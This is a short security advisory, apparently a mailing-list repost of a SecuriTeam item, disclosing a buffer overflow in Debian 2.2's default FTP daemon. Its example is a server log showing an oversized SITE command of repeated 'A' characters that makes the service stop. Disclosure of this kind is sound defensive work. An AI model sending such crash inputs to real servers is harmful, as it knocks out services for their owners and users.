Debian FTP Daemon Vulnerable to Buffer Overflow (SITE)
> SecuriTeam web site: http://www.securiteam.com
>
> Debian FTP Daemon Vulnerable to Buffer Overflow (SITE)
> ------------------------------------------------------------------------
>
> SUMMARY
>
> A security vulnerability in Debian FTP Daemon has been discovered. The
> vulnerability arises when a buffer of 400 bytes or more is sent to the
> FTPd daemon in a SITE command.
>
> DETAILS
>
> Vulnerable systems:
> Debian 2.2 is 2.2r3 default FTPd daemon Version 6.2/OpenBSD/Linux-0.10
>
> Example:
> May 18 12:32:46 ts ftpd[677]: ts FTP server (Version
> 6.2/OpenBSD/Linux-0.10) ready.
> May 18 12:32:47 ts ftpd[677]: command: SITE
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
> May 18 12:32:47 ts ftpd[677]: <--- 500
> May 18 12:32:47 ts ftpd[677]: 'SITE
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
> ': command not understood.
> May 18 12:32:47 ts ftpd[677]: <--- 221
> May 18 12:32:47 ts ftpd[677]: You could at least say goodbye.
> May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service
> terminated
>
>
> ADDITIONAL INFORMATION
>
> The information has been provided by <mailto:feedback@tamersahin.net>
> Tamer Sahin.
[ ]'s
*************************** .''`.
* cosmo@hackhour.com.br * : :' :
* www.hackhour.com.br * `. `'`
* Hack Hour Inc. * `-
*************************** Debian
Reply to: